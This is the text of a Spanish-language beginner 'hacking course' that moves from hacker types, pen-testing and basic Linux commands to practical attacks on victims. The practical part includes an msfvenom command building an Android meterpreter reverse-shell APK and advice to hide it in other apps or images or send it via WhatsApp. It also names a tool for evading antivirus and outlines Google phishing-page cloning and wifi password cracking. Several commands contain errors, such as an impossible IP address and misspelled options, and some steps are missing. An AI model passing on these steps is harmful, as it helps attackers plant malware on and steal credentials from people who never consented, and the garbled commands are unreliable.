Curso de Hacking para Principiantes PDF
Curso de Hacking para Principiantes PDF
Curso de Hacking para Principiantes PDF
para Principiantes
https://www.facebook.com/watchdogsgdl/
Parte 1: Teoria
¿Que es un hacker?
Según su propio diccionario, un hacker “es todo individuo que se dedica a programar de
forma entusiasta, o sea un experto entusiasta de cualquier tipo”, y fuera del ámbito
informático se le llama “hacker” a toda persona que implementa soluciones para cualquier
sistema, sea informático o no, de manera que éste pueda emplearse de formas no pensadas por
quienes crearon dichos sistemas. Así mismo, en la era actual 2.0 el término hacker se asocia
a toda persona que manipula o que posee conocimientos prácticos que modifican los usos de
las cosas de modo que éstas puedan emplearse para fines no previstos en su origen.
Para el público general, mencionar la palabra “hacker” evoca a alguien que usa su PC para
entrar en un sitio sin autorización y cometer actos fraudulentos. Pero en realidad existen
varias clases de hackers en el mundo (no hay que confundir el término “hacker” con el término
“pirata informático”), tres para ser más exactos, y te las vamos a describir para que veas porque
hacerse white hat hacker es una de las profesiones con más futuro de 2018 por lo
demandados que son sus servicios.
White Hat Hacker: Los hackers con sentido ético, en este grupo se engloban tanto los investigadores
de seguridad como aquellos que rompen sistemas por razones no maliciosas para probar sus propios
códigos de seguridad, o para demostrar a un cliente o en una empresa en la que trabajan que
el software y los protocolos no son seguros. Son los que notifican a las compañías si ven
vulnerabilidades aprovechables, y a cambio se les puede pagar de 500 a 100.000 dólares incluso,
dependiendo de la importancia del problema, de la posible brecha en potencia y del renombre
de la compañía.
Gray Hat Hacker: A medio camino entre uno y otro bando, los hackers en la zona gris pueden ser
tanto contratistas de Defensa como individuos anónimos o grupos de estos que hackean un sistema
o toda una compañía y después les comunican lo que han hecho y cómo podrían arreglar sus fallos
de seguridad. Su ambigüedad estriba en que venden la información que han obtenido, pero lo hacen
por el bien del público. Aunque existen gobiernos que pagan por estos datos y las herramientas de
hackeo y no los usan para tapar agujeros de seguridad, sino a su favor para espiar a potencias
enemigas.
Black Hat Hacker: Considerados directamente como criminales y ejemplificando todo lo negativo
en que solemos pensar al leer el término ‘hacker’, un black hat es un hacker que “viola la seguridad
de un dispositivo para poco menos que provecho personal y de mala fe”. Hablamos de los que
hacen los virus malware, ransomware, todo el SPAM que recibimos en el correo, las brechas de
seguridad dentro de las grandes empresas, etc, para entrar, modificar o destrozar datos según les
convengan. Y también para robar datos de usuarios y venderlos a quien pague más.
https://www.facebook.com/watchdogsgdl/
Metodologías para asegurar la información
Test de penetración: Mejor conocido como pen-testing, es la metodología de probar
una y otra vez un sistema hasta encontrar una vulnerabilidad, y a partir de ahí, mejorar
el sistema, si se hace suficientes veces la información del sistema sera mas difícil de
comprometer.
Tipos de pen-testing
Auditoría de “Caja blanca”: son las auditorías que se realizan con acceso a la información
interna de la empresa, por ejemplo: detalles de la red como: segmentos de red, mapa de red,
firewall, impresora en red, sistemas operativos utilizados, tipo de autenticación, usuarios,
tecnología del sitio web, etc. Se puede utilizar para simular un ataque a la infraestructura
de una persona que pertenece a la organización, por ejemplo un trabajador cabreado.
Es útil porque no se invierte tiempo en el “fingerprint” (descubrimiento) de la infraestructura,
sistemas utilizados, etc.
Auditoría de “Caja gris”: es la auditoría que mezcla características de las dos anteriores,
posiblemente sea la mejor porque simulemos un ataque y a la vez consigamos un mejor
código de nuestras aplicaciones, se pude dar a conocer parte de la información al auditor
y pedirle que a partir de ella intente “escalar” al resto del sistema además se puede intentar
este test comenzando desde varios puntos, red interna, red externa, a través del wifi,
a través del puesto de un empleado, a traves de la extranet, etc.
Auditoría de “Caja negra”: es la auditoría que se realiza sin dar ningún tipo de información
al auditor y es el quien debe descubrir el segmento de red, los sistemas utilizados,
la tecnología del sitio web, etc.
Es útil para simular un ataque de un intruso real y darnos una idea de las consecuencias
que esto puede tener, puede llevar mas tiempo.
https://www.facebook.com/watchdogsgdl/
Tipos de Ataques
Ataques Pasivos: Se busca obtener y monitorear la información SIN alertar al usuario
o sus datos.
Fases de un Ataque
Fase 1: Reconnaissance (Reconocimiento)
Esta etapa involucra la obtención de información (Information Gathering) con respecto a una
potencial víctima que puede ser una persona u organización. Por lo general, durante esta
fase se recurre a diferentes recursos de Internet como Google,entre tantos otros, para recolectar
datos del objetivo. Algunas de las técnicas utilizadas en este primer paso son la Ingeniería
Social, el Dumpster Diving, el sniffing.
En esta segunda etapa se utiliza la información obtenida en la fase 1 para sondear el blanco y
tratar de obtener información sobre el sistema víctima como direcciones IP, nombres de host,
datos de autenticación, entre otros. Entre las herramientas que un atacante puede emplear
durante la exploración se encuentra el network mappers, port mappers, network scanners,
port scanners, y vulnerability scanners.
Una vez que el atacante ha conseguido acceder al sistema, buscará implantar herramientas
que le permitan volver a acceder en el futuro desde cualquier lugar donde tenga acceso a Internet.
Para ello, suelen recurrir a utilidades backdoors, rootkits y troyanos.
Una vez que el atacante logró obtener y mantener el acceso al sistema, intentará borrar todas
las huellas que fue dejando durante la intrusión para evitar ser detectado por el profesional de
seguridad o los administradores de la red. En consecuencia, buscará eliminar los archivos de registro
(log) o alarmas del Sistema de Detección de Intrusos (IDS).
https://www.facebook.com/watchdogsgdl/
Parrot
Parrot es una distribución de Linux basada en Debian, que se especializa en la seguridad
informatica.
Al iniciar Parrot es recomendable actualizarlo, para hacer esto se ingresa en la Terminal
el comando: apt-get updade && apt-get upgrade, esto actualiza el sistema e instala
nuevas versiones. (Para este curso no necesitas hacerlo, pero hazlo cuando comiences
a trabajar por tu cuenta).
Comandos Basicos
ifconfig: Te da información sobre tu red, como tu IP local y global.
route -n: Te da la IP del router en el que estas conectado.
cal: El comando “cal” significa calendario y simplemente muestra el calendario en su pantalla.
who: El comando “who” muestra todos los usuarios que se han registrado en el sistema actualmente.
El texto tty2 es la línea de terminal que el usuario está usando y la siguiente línea indica la fecha y
la hora actual.
ls: El comando “ls” simplemente muestra el contenido de un directorio.
cd: “cd” significa “cambio de directorio” (change directory) y cambia del directorio actual a un
nuevo directorio.
man: El comando “man” significa “manual” y puede mostrar el manual incorporado para la mayoría
de los comandos que necesitamos. Digamos que es como escribir “/?” para Windows.
mkdir: “mkdir” significa “crear directorio” (make directory) y crea un nuevo directorio. Usamos “cd”
(comando visto anteriormente) para entrar en el directorio recién creado.
rmdir: El comando “rmdir” significa “remover directorio” (remove directory) y elimina cualquier
directorio que queramos eliminar.
pwd: El comando “pwd” significa “directorio actual de trabajo” (present working directory) y como
dice el nombre, muestra el directorio en el que nos encontramos actualmente.
touch: El comando “touch” crea un archivo (no un directorio) y puede agregar una extensión
como .txt para que sea un archivo de texto.
cp: Este comando “cp” significa “copia” (Copy) y simplemente copia y pega el archivo donde
se especifique.
mv: El comando “mv” significa ‘mover’ y simplemente mueve un archivo de un directorio a
otro directorio.
rm: El comando “rm” se utilizar para eliminar y añadiendo “-r” simplemente elimina de forma
forzada un archivo sin preguntar al usuario.
chmod: El comando “chmod” significa “Cambiar el modo de comando” (change mode command).
Como hay muchos modos en Unix, este se pueden utilizar para manipular los archivos.
Básicamente hay 3 modos que podemos utilizar con el comando “chmod”
+w: Sigla de escritura (write) que cambia los permisos de un archivo para escribir.
+r: Sigla de lectura (read) y modifica los permisos del archivo para leer.
+x: Generalmente se usa para hacer un archivo ejecutable.
file: El comando “file” muestra el tipo de archivo. Como mencioné anteriormente Linux trata
todo como archivo.
sort: Como su nombre sugiere (si es que conoces de inglés), el comando “sort” ordena el
contenido del archivo de acuerdo con las reglas ASCII.
grep: grep es un acrónimo para “buscar globalmente una expresión regular e imprimirla”
(globally search a regular expression and print it). El comando “grep” busca la entrada especificada
completamente (globalmente) para una coincidencia con el patrón escrito, y lo muestra.
Para omitir entre mayúsculas y minúsculas se agrega -i
clear: El comando “clear” se utiliza para limpiar el terminal y que pueda escribir con más precisión.
Alternativamente puede presionar las teclas Ctrl + L
https://www.facebook.com/watchdogsgdl/
Parte 2: Práctica
Escaneo: NMAP
Nmap escanea 1000 puertos del objetivo, que puede ser un servidor o una PC, la “vv” le
dice que lo muestre de forma grafica en la terminal.
Para hacer un escaneo mas especifico, buscando solo un puerto en especial, un ejemplo
de sintaxis puede ser:
nmap -oG -(IP) -p (# de puerto) -vv ejemplo: nmap -oG -206.258.0.1 -p 80 -vv
Otra opción es utilizar netscan en cualquier OS para visualizar sus conexiones, o podrias
utilizar ingenieria social con paginas como www.whatstheirip.com
https://www.facebook.com/watchdogsgdl/
Ataque de Ingenieria social (Phishing)
Este ataque cae dentro de la categoría de “Phising”, en esta ocasión vamos a crear
una pagina falsa que clonaremos de Google, que escanee los campos de usuario y
contraseña, para hacerlo sigue los pasos siguientes:
https://www.facebook.com/watchdogsgdl/
Android Hacking
Para atacar a in dispositivo Android, lo que haremos será crear un archivo .apk
malware, esto nos permitira obtener acceso al dispositivo una vez que se instale; es
importante que sepas que este es un curso de principiante y la metodología es basica,
asi que solo te enseñaremos a crear el archivo, puedes investigar en internet para ocultar
tu malware en otro .apk, o en imagenes o hasta enviarlo por whatsapp.
Nota. Este mismo metodo es el que utilizaras para crear archivos .exe.
Para crear nuestro .apk, utilizaremos una extensión de metasploit que se llama
msfvenom. Los pasos a seguir son:
ejemplo:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.2 LSPORT=443 R> hack.apk
Nota: es preferible utilizar los puertos 443 o 4444
Nota: Utiliza el comando “h” para saber que funciones puedes ejecutar
https://www.facebook.com/watchdogsgdl/
Malware para Windows
En esta sección utilizaremos el mismo tipo de malware que metasploit maneja y se crea con
el mismo procedimiento que la sección anterior. El problema de este malware es que es
muy fácil de detectar y por ello solamente funcionará en equipos desactualizados o que
no tengan antivirus.
Pero no te desanimes todavía, hay un método que te permitirá sacarle la vuelta a muchos
de los antivirus en el mercado, la herramienta se llama Shellter y lo que hace es recodificar
el malware de forma que sea mas dicifil para un antivirus detectarlo.
https://www.facebook.com/watchdogsgdl/
Ataque Wifi
Antes de abrir Fern, necesitamos activar el modo monitoreo en nuestra tarjeta wifi, para
hacerlo abre una terminal y escribe el siguiente comando:
Nota: Para redes WPA es necesario que cuentes con un diccionario de palabras, Fern cuenta
con un diccionario predeterminado pero es recomendable que bajes otros de internet o que
hagas tu propio diccionario con “Crunch”
https://www.facebook.com/watchdogsgdl/